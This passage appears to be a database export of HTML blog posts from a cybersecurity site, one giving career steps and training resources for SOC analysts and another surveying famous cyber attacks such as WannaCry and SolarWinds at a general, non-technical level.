Aim to understand the key principles and practices for protecting systems.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Recommended Training</strong></b>:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Free Courses</strong></b>:\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">ISC²\'s Certified Cybersecurity course</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Google’s Cybersecurity Specialization</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\">Cisco’s Junior Cybersecurity Analyst path</li>\r\n</ul>\r\n</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"5\"><b><strong class=\"font-bold\">Paid Options</strong></b>:\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"6\">CompTIA Security+ training from CBT Nuggets</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"7\">Free Security+ guides by Professor Messer on 
YouTube</li>\r\n</ul>\r\n</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Spend about 4–6 months building a strong foundation in cybersecurity concepts before tackling advanced areas.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Step 4: Focus on SOC-Specific Fundamentals</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">SOC Analysts require specific technical skills to excel in their roles, such as log analysis, alert handling, and expertise in tools like SIEMs and SOAR platforms.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Training Resources</strong></b>:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Free</strong></b>:\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Splunk’s free courses and \"Boss of the SOC\" capture-the-flag challenges</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Microsoft SC-200 free modules</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\">Antisyphon SOC Analyst pay-what-you-can training</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] 
[&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"5\">TryHackMe’s and LetsDefend’s SOC-specific learning paths</li>\r\n</ul>\r\n</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"6\"><b><strong class=\"font-bold\">Affordable Options</strong></b>:</li>\r\n</ul>\r\n<ul>\r\n 	<li style=\"list-style-type: none\">\r\n<ul>\r\n 	<li class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">TCM Security\'s Junior SOC Analyst course</li>\r\n</ul>\r\n</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">These tools and techniques will prepare you to confidently monitor and respond to real-world security events.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Step 5: Gain Hands-On Experience</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Practical experience is essential for understanding SOC Analyst responsibilities. 
Here’s how you can sharpen your skills:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Build a Home Lab</strong></b>: Install tools like VirtualBox or VMware to simulate real-world scenarios.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Practice Hacking</strong></b>:\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Platforms like HackTheBox, TryHackMe, and Blue Team Labs offer immersive SOC-focused challenges and exercises.</li>\r\n</ul>\r\n</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">Volunteer Opportunities</strong></b>: Apply your growing skills by offering cybersecurity support to nonprofit organizations or small businesses.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Step 6: Earn Key Certifications</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Certifications are vital to proving your expertise to employers. 
Start with beginner-level certs and gradually move to specialty certifications:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">CompTIA Security+</strong></b> (essential foundation)</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">CySA+</strong></b> (SOC-focused certification)</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Microsoft SC-200 or Cisco CCNA CyberOps</strong></b> (specialized certs for SOC analysts)</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Step 7: Build and Showcase Your Portfolio</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Creating a portfolio is an excellent way to demonstrate your skills to potential employers. 
Include:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Home lab setups</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Network diagrams</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Exercises completed on cybersecurity platforms</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\">GitHub repositories highlighting your technical projects</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Step 8: Develop Soft Skills</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">SOC Analysts work in team environments and communicate detailed findings to stakeholders. 
Work on the following skills:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Writing concise and clear incident reports</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Investigating and analyzing mock security incidents</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Developing teamwork and problem-solving capabilities</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Step 9: Connect with Industry Professionals</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Networking is the fastest way to access new job opportunities. Attend cybersecurity meetups, webinars, and conferences. Use platforms like LinkedIn, Reddit, and Twitter to engage with industry leaders and seek mentorship.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Step 10: Land Your SOC Analyst Job</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">With your certifications, skills, and portfolio ready, start applying for entry-level SOC Analyst roles. Tailor your resume to the specific job descriptions, highlighting relevant experience and projects. 
Prepare thoroughly for interviews, focusing on:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Incident response scenarios</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Log analysis techniques</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Familiarity with cybersecurity tools</li>\r\n</ul>', '', NULL, NULL, 1, 'draft', '2025-01-21 21:48:29', '2026-01-12 21:41:44', 'Information Security', 'How to Become a SOC Analyst in 2025', '', NULL),
(67, 'The Evolution of Cyber Attacks: A Historical Perspective', 'the-evolution-of-cyber-attacks-a-historical-perspective', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cybersecurity is no longer an optional consideration for businesses or individuals—it’s essential. With every advancement in technology, the digital landscape grows more complex, and so do the threats that target it. Whether you\'re a tech enthusiast, a cybersecurity professional, or a small business owner, understanding the evolution of cyber attacks is key to staying ahead of the curve.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">From the early days of hacking to sophisticated ransomware and AI-driven attacks, the evolution of cyber threats highlights the need for continuous innovation in cybersecurity. This blog explores the historical milestones in cyber attacks, how defenses have evolved to counter these threats, emerging trends, and why small businesses must prioritize their cybersecurity strategies.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Historical Timeline of Major Cyber Attacks</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cyber attacks have been around as long as computers have existed. 
Let\'s take a walk through some of the most notable cyber events in history:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">The Morris Worm (1988)</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Considered the first major worm to spread via the internet, the Morris Worm infected approximately 10% of systems connected to ARPANET (a precursor to the modern internet). This incident highlighted the importance of digital security and inspired the need for incident response mechanisms.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">The ILOVEYOU Virus (2000)</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A socially engineered worm that posed as a love letter email attachment, this virus caused over $10 billion in damages worldwide. It demonstrated how human error and social engineering could fuel widespread cyber attacks.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">The Target Breach (2013)</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Hackers stole approximately 40 million credit and debit card records from Target. 
This breach exposed vulnerabilities in supply chain security, as the attack began with a third-party vendor\'s compromised credentials.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">The WannaCry Ransomware Attack (2017)</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Exploiting a Windows vulnerability, WannaCry impacted over 150 countries, encrypting files and demanding Bitcoin ransom payments. This attack showcased the global scale of modern cyber threats and emphasized the importance of regular software updates.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">SolarWinds Attack (2020)</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A supply chain attack that infiltrated numerous government agencies and businesses through compromised software updates. 
This attack underlined the risks associated with third-party dependencies.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">From viruses propagating through floppy disks to attacks exploiting zero-day vulnerabilities, each milestone has shaped the current cybersecurity landscape.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Colonial Pipeline Ransomware Attack (2021)</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A ransomware attack targeting the Colonial Pipeline, a major fuel pipeline operator in the United States. The attackers used a compromised password to gain entry, resulting in significant disruptions to fuel supply across the East Coast. This incident highlighted the vulnerabilities in critical infrastructure and the importance of strengthening cybersecurity in essential services.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">AI-Generated Deepfake Scams</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Recent cases have surfaced where attackers utilized AI-generated deepfake technology to mimic voices or video footage of executives, tricking employees into authorizing fraudulent transactions. 
These incidents demonstrate the emerging threat of AI-powered tools being manipulated for malicious purposes, underscoring the need for advanced detection systems and employee awareness training.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Evolution of Cybersecurity Measures</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cybersecurity measures have grown in sophistication in response to increasingly advanced attacks. Here’s how the game has evolved:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Defense in Depth</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Early defenses like firewalls and basic antivirus software have now expanded into a multi-layered defense strategy. Defense in depth involves employing multiple security layers to protect critical data and prevent breaches at various stages.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Incident Response</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The Morris Worm incident demonstrated the importance of having a plan in place to react to cyber threats. 
Today, advanced incident response frameworks help organizations quickly detect, contain, and resolve cyber incidents.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Role of AI in Cybersecurity</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Artificial intelligence is revolutionizing the cybersecurity industry. Tools powered by AI can identify suspicious patterns in real-time, automate threat detection, and even predict potential vulnerabilities.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Shift-Left Security</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The shift-left strategy emphasizes early vulnerability detection during software development stages. By considering security from the start, businesses are reducing remediation costs and risks.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Every security evolution is a response to a past attack, creating a continuous cycle of risk and innovation.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Future Trends in Cybersecurity</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The digital world isn’t standing still, and neither are cyber threats. 
Here’s what the future of cybersecurity might look like:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Emerging Threats</strong></b></li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">AI-driven Attacks</strong></b>: Just as AI is being used for defense, cybercriminals are leveraging it to execute smarter, more adaptive attacks.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Supply Chain Attacks</strong></b>: The SolarWinds attack has set a precedent for targeting vulnerabilities in supply chains.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">New Technologies</strong></b></li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"5\"><b><strong class=\"font-bold\">Quantum Computing</strong></b>: Quantum technology promises to disrupt encryption, making traditional security methods obsolete.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"6\"><b><strong class=\"font-bold\">Zero Trust Architecture</strong></b>: This model ensures that no entity is trusted automatically, even within the network, ensuring stricter access control.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] 
[&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"7\"><b><strong class=\"font-bold\">Regulatory Challenges</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">With the rise of data privacy regulations like GDPR, cybersecurity teams will also need to focus on compliance for the foreseeable future.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The ability to anticipate these trends and prepare in advance will differentiate resilient, proactive organizations from vulnerable ones.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">The Importance of Cybersecurity for Small Businesses</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">While headlines often focus on large corporations or government hacks, small businesses are frequently targeted as low-hanging fruit for cybercriminals:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Why Small Businesses Are Vulnerable</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Budget constraints often mean fewer resources allocated to IT security. 
